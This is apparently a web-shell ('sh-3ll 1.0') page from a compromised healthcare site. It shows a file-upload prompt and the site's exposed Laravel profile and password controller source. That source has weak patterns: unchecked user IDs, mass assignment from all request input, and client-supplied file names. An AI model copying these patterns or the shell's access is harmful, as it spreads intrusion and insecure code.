HOME


sh-3ll 1.0
DIR:/proc/self/cwd/bright.medisavehealthcarebd.com/app/Http/Controllers/Admin/
Upload File :
Current File : //proc/self/cwd/bright.medisavehealthcarebd.com/app/Http/Controllers/Admin/ProfileController.php
<?php

namespace App\Http\Controllers\Admin;

use App\Http\Controllers\Controller;
use App\Models\User;
use Illuminate\Http\Request;
use Illuminate\Support\Facades\Auth;
use Illuminate\Support\Facades\File;
use Illuminate\Support\Facades\Hash;

class ProfileController extends Controller
{
    /**
     * Show the form for editing the specified resource.
     *
     * @param  int  $id
     * @return \Illuminate\Http\Response
     */
    public function edit()
    {
        // Retrieving models
        $user = User::first();

        return view('admin.profile.edit', compact('user'));
    }

    /**
     * Update the specified resource in storage.
     *
     * @param  \Illuminate\Http\Request  $request
     * @param  int  $id
     * @return \Illuminate\Http\Response
     */
    public function update(Request $request, $id)
    {

        // Form validation
        $request->validate([
            'name' => 'required|max:255',
            'email' => 'required|email|max:255',
            'profile_photo_path' => 'image|mimes:jpeg,jpg,png|max:300',
        ]);

        // Get user
        $user = User::find($id);

        // Get All Request
        $input = $request->all();

        if($request->hasFile('profile_photo_path')){

            // Get image file
            $profile_photo_path = $request->file('profile_photo_path');

            // Folder path
            $folder ='uploads/img/profile/';

            // Make image name
            $profile_photo_path_name =  time().'-'.$profile_photo_path->getClientOriginalName();

            // Delete Image
            File::delete(public_path($folder.$user->profile_photo_path));

            // Upload image
            $profile_photo_path->move($folder, $profile_photo_path_name);

            // Set input
            $input['profile_photo_path']= $profile_photo_path_name;

        }

        // Update user
        User::find($id)->update($input);

        return redirect()->route('profile.edit')
            ->with('success', 'content.user_updated_successfully');
    }

    /**
     * Display a change-password view.
     *
     * @return \Illuminate\Http\Response
     */
    public function change_password_edit()
    {
        return view('admin.profile.change-password');
    }

    /**
     * Update password.
     *
     * @param  \Illuminate\Http\Request  $request
     * @return \Illuminate\Http\Response
     */
    public function change_password_update(Request $request)
    {
        // Get All Request
        $input = $request->all();

        // User ID
        $id = Auth::id();

        // Current password
        $current_password = Auth::User()->password;

        if(Hash::check($input['current_password'], $current_password))
        {
            // Form validation
            $request->validate([
                'password' => ['required', 'string', 'confirmed'],
            ]);

            // Update password
            User::find($id)->update([
                'password' => Hash::make($input['password']),
            ]);

            return redirect()->route('profile.change_password_edit')
                ->with('success', 'content.updated_successfully');

        } else{
            return redirect()->route('profile.change_password_edit')
                ->with('warning', 'content.password_change_failed');
        }
    }
}